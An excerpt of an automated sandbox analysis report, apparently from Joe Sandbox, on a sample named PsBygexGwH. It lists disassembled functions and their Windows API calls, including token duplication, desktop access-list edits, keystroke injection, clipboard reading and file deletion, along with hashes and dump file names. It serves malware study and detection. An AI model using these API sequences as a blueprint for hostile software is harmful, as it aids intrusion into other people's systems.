GetParent.USER32(?), ref: 001B9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 001B9BFA
SendMessageW.USER32 ref: 001B9C2B
ClientToScreen.USER32(?,?), ref: 001B9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001B9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 001B9CDE
SendMessageW.USER32 ref: 001B9D01
ClientToScreen.USER32(?,?), ref: 001B9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001B9D82

Part of subcall function 00139944: GetWindowLongW.USER32(?,000000EB), ref: 00139952

GetWindowLongW.USER32(?,000000F0), ref: 001B9E05

Strings

F, xrefs: 001B9D07
@GUI_DRAGID, xrefs: 001B997D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 14831b63ee61a2285a83a4bb74460dd12b4619f1b57529b4df2db38dc84fbda8
Instruction ID: 345b1ed5f268085b66dd21059cd271147b266bd6f683c82729cc9143955e0917
Opcode Fuzzy Hash: 14831b63ee61a2285a83a4bb74460dd12b4619f1b57529b4df2db38dc84fbda8
Instruction Fuzzy Hash: 2F42AB74204241AFDB24CF28CC84EEABBE5FF49314F144619F699876A1D771E8A2CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001B4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001B48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001B4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001B4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001B494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001B495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001B497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001B49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001B49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001B4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001B4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001B4A7E
IsMenu.USER32(?), ref: 001B4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001B4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001B4B20
GetWindowLongW.USER32(?,000000F0), ref: 001B4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001B4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001B4C82
wsprintfW.USER32 ref: 001B4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001B4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 001B4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001B4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001B4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 001B4D5A

Strings

%d/%02d/%02d, xrefs: 001B4CA8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 8a1ac1a76142170a4946fdd153a1b3c24cd08ea7566e861ef2375eabb384af8b
Instruction ID: e9f1b528d84d2350e8ebd830b49dcb8a9b630e2c01e736af79160ae34442b2b7
Opcode Fuzzy Hash: 8a1ac1a76142170a4946fdd153a1b3c24cd08ea7566e861ef2375eabb384af8b
Instruction Fuzzy Hash: 8612B171600214ABEB259F68CC49FEE7BF8EF49714F108229F516DB2E2DB749941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0013F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0013F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0017F474
IsIconic.USER32(00000000), ref: 0017F47D
ShowWindow.USER32(00000000,00000009), ref: 0017F48A
SetForegroundWindow.USER32(00000000), ref: 0017F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0017F4AA
GetCurrentThreadId.KERNEL32 ref: 0017F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0017F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0017F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0017F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0017F4DE
SetForegroundWindow.USER32(00000000), ref: 0017F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F4F6
keybd_event.USER32(00000012,00000000), ref: 0017F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F50B
keybd_event.USER32(00000012,00000000), ref: 0017F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F519
keybd_event.USER32(00000012,00000000), ref: 0017F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017F528
keybd_event.USER32(00000012,00000000), ref: 0017F52D
SetForegroundWindow.USER32(00000000), ref: 0017F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0017F557

Strings

Shell_TrayWnd, xrefs: 0017F46F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 7dac0dda046d377a8253058c8e9d8f5d61193d4b525ded7227cfe5d314438c5a
Instruction ID: 2b49455629e0fcc210cd09828da0cd977c3aa1ad74594f549e2532a0c161828c
Opcode Fuzzy Hash: 7dac0dda046d377a8253058c8e9d8f5d61193d4b525ded7227cfe5d314438c5a
Instruction Fuzzy Hash: 5E319271B40218BBEB206BB59C4AFBF7E7CEB44B50F10412AFA05E61D1C7B05D41AEA0

Uniqueness

Uniqueness Score: -1.00%

Function 00181201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 001816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0018170D
Part of subcall function 001816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0018173A
Part of subcall function 001816C3: GetLastError.KERNEL32 ref: 0018174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00181286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001812A8
CloseHandle.KERNEL32(?), ref: 001812B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001812D1
GetProcessWindowStation.USER32 ref: 001812EA
SetProcessWindowStation.USER32(00000000), ref: 001812F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00181310

Part of subcall function 001810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001811FC), ref: 001810D4
Part of subcall function 001810BF: CloseHandle.KERNEL32(?,?,001811FC), ref: 001810E9

Strings

default, xrefs: 0018130B
winsta0, xrefs: 001812CC
, xrefs: 0018125A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 2080669171c0b2c63136cfb7461cb24f3a98bc40a9fc290878d4c7c3d57d9b14
Instruction ID: e5b04adb30161900613aa485a6a7ad287be716d64b3d438535ba80019b8ca1ee
Opcode Fuzzy Hash: 2080669171c0b2c63136cfb7461cb24f3a98bc40a9fc290878d4c7c3d57d9b14
Instruction Fuzzy Hash: 71816D72900249BBDF11AFA4DC89FEE7BBDEF04704F144129F911A62A0D7718A86CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00180B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00181114
Part of subcall function 001810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181120
Part of subcall function 001810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 0018112F
Part of subcall function 001810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181136
Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0018114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00180BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00180C00
GetLengthSid.ADVAPI32(?), ref: 00180C17
GetAce.ADVAPI32(?,00000000,?), ref: 00180C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00180C6D
GetLengthSid.ADVAPI32(?), ref: 00180C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00180C8C
HeapAlloc.KERNEL32(00000000), ref: 00180C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00180CB4
CopySid.ADVAPI32(00000000), ref: 00180CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00180CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00180D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00180D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180D45
HeapFree.KERNEL32(00000000), ref: 00180D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180D55
HeapFree.KERNEL32(00000000), ref: 00180D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180D65
HeapFree.KERNEL32(00000000), ref: 00180D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00180D78
HeapFree.KERNEL32(00000000), ref: 00180D7F

Part of subcall function 00181193: GetProcessHeap.KERNEL32(00000008,00180BB1,?,00000000,?,00180BB1,?), ref: 001811A1
Part of subcall function 00181193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00180BB1,?), ref: 001811A8
Part of subcall function 00181193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00180BB1,?), ref: 001811B7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: b470018c7735560f8bb1c347d27127c08e86603703dcc75ef2a7fea5ee22c06a
Instruction ID: f4d40449ebb55edcd8f594d7e63593e0c2b865e5ffa8a8fec302258407443271
Opcode Fuzzy Hash: b470018c7735560f8bb1c347d27127c08e86603703dcc75ef2a7fea5ee22c06a
Instruction Fuzzy Hash: EC716A7690020AAFDF51EFE4DC44BAEBBB8BF08310F044615F914A7191D771AA49CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(001BCC08), ref: 0019EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0019EB37
GetClipboardData.USER32(0000000D), ref: 0019EB43
CloseClipboard.USER32 ref: 0019EB4F
GlobalLock.KERNEL32(00000000), ref: 0019EB87
CloseClipboard.USER32 ref: 0019EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0019EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0019EBC9
GetClipboardData.USER32(00000001), ref: 0019EBD1
GlobalLock.KERNEL32(00000000), ref: 0019EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0019EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0019EC38
GetClipboardData.USER32(0000000F), ref: 0019EC44
GlobalLock.KERNEL32(00000000), ref: 0019EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0019EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0019EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0019ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0019ECF3
CountClipboardFormats.USER32 ref: 0019ED14
CloseClipboard.USER32 ref: 0019ED59

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: a3ec4f2d0ccbee62d66b4b343ba51579830cd8919e7b947b04d6a24d9164b6da
Instruction ID: f5092074ee3e2579ea1fd90e52d5f84dd155d3d6c2394673f79a5b8bea9131a9
Opcode Fuzzy Hash: a3ec4f2d0ccbee62d66b4b343ba51579830cd8919e7b947b04d6a24d9164b6da
Instruction Fuzzy Hash: 6961DF34204202AFDB00EF64D885F6AB7E4FF94714F18465DF4569B2A2DB31DD85CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001969BE
FindClose.KERNEL32(00000000), ref: 00196A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00196A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00196A75

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00196AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00196ADF

Strings

%4d, xrefs: 00196BB1
%03d, xrefs: 00196DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00196B32
%4d%02d%02d%02d%02d%02d, xrefs: 00196B6A
%02d, xrefs: 00196C00, 00196C0A, 00196C5A, 00196CAA, 00196CFA, 00196D4A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 221d2355e4bb44c72e8b1088b67e92a2e92a6cbaa3d5f03c0e700721cf746a18
Instruction ID: 910281344aa3c180a5f4f4bc2216aad2cd40c752626eb3d48bc96cc3a52b279c
Opcode Fuzzy Hash: 221d2355e4bb44c72e8b1088b67e92a2e92a6cbaa3d5f03c0e700721cf746a18
Instruction Fuzzy Hash: 09D16DB2508310AEC710EBA4D991EAFB7ECBF98704F44491DF585C7191EB34DA58CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00199642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00199663
GetFileAttributesW.KERNEL32(?), ref: 001996A1
SetFileAttributesW.KERNEL32(?,?), ref: 001996BB
FindNextFileW.KERNEL32(00000000,?), ref: 001996D3
FindClose.KERNEL32(00000000), ref: 001996DE
FindFirstFileW.KERNEL32(*.*,?), ref: 001996FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0019974A
SetCurrentDirectoryW.KERNEL32(001E6B7C), ref: 00199768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00199772
FindClose.KERNEL32(00000000), ref: 0019977F
FindClose.KERNEL32(00000000), ref: 0019978F

Strings

*.*, xrefs: 001996F5

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 652361b646c25fba18219bacd32aa0c4599309c3a4b610f640c9808a64127c4b
Instruction ID: b77beea77105e57f4d6e7d78c38ce85bda1fd6a33dc79266d50f0a97f4424448
Opcode Fuzzy Hash: 652361b646c25fba18219bacd32aa0c4599309c3a4b610f640c9808a64127c4b
Instruction Fuzzy Hash: 5131D5325006196BDF14EFF9DC48EDE77ACAF49320F14429AF805E21A1DB74DD808EA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 001997BE
FindNextFileW.KERNEL32(00000000,?), ref: 00199819
FindClose.KERNEL32(00000000), ref: 00199824
FindFirstFileW.KERNEL32(*.*,?), ref: 00199840
SetCurrentDirectoryW.KERNEL32(?), ref: 00199890
SetCurrentDirectoryW.KERNEL32(001E6B7C), ref: 001998AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 001998B8
FindClose.KERNEL32(00000000), ref: 001998C5
FindClose.KERNEL32(00000000), ref: 001998D5

Part of subcall function 0018DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0018DB00

Strings

*.*, xrefs: 0019983B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 93d0364eb8a7c6fe0d0df9110cf532042a911ad5274eb85d5b4b0e8a57f16916
Instruction ID: f6472da988dfea844d476b05e0e2077671481e715e613e3c1d71f441b3551ae8
Opcode Fuzzy Hash: 93d0364eb8a7c6fe0d0df9110cf532042a911ad5274eb85d5b4b0e8a57f16916
Instruction Fuzzy Hash: 0D31E63150065D6FDF14EFB9EC48ADE77ACAF0A320F14429EE850A21A1DB70DE84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001ABE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001ABF3E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001ABFA9
RegCloseKey.ADVAPI32(00000000), ref: 001ABFCD
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001AC02C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001AC0E7
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001AC154
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001AC1E9
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 001AC23A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001AC2E3
RegCloseKey.ADVAPI32(?,?,00000000), ref: 001AC382
RegCloseKey.ADVAPI32(00000000), ref: 001AC38F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 7a60400484b5346d6d29e72c7312344bcb190b7556282917d954a073d6ad5a0b
Instruction ID: 8db3dc6932ca3903ce3ba9d7546e0abfcc6ad752b75b83de48dc8bf1b5540fd2
Opcode Fuzzy Hash: 7a60400484b5346d6d29e72c7312344bcb190b7556282917d954a073d6ad5a0b
Instruction Fuzzy Hash: 93025C756042009FCB14DF28C891E2ABBE5FF89318F19849DF84ADB2A2D731EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00198195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00198257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00198267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00198273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00198310
SetCurrentDirectoryW.KERNEL32(?), ref: 00198324
SetCurrentDirectoryW.KERNEL32(?), ref: 00198356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0019838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00198395

Strings

*.*, xrefs: 0019839B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 0389702ac7c2be012d1d42ca74066716da87801004872c0834800475e2390b9c
Instruction ID: 99d6b002b5cd13eb233543af30c09566f026d3770dbc18e043aff0bf642723f9
Opcode Fuzzy Hash: 0389702ac7c2be012d1d42ca74066716da87801004872c0834800475e2390b9c
Instruction Fuzzy Hash: 016148725083059FCB10EF64D8819AEB3E8FF99314F04892EF999D7251DB31EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0018D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2

Part of subcall function 0018E199: GetFileAttributesW.KERNEL32(?,0018CF95), ref: 0018E19A

FindFirstFileW.KERNEL32(?,?), ref: 0018D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0018D1DD
MoveFileW.KERNEL32(?,?), ref: 0018D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0018D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0018D237

Part of subcall function 0018D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0018D21C,?,?), ref: 0018D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0018D253
FindClose.KERNEL32(00000000), ref: 0018D264

Strings

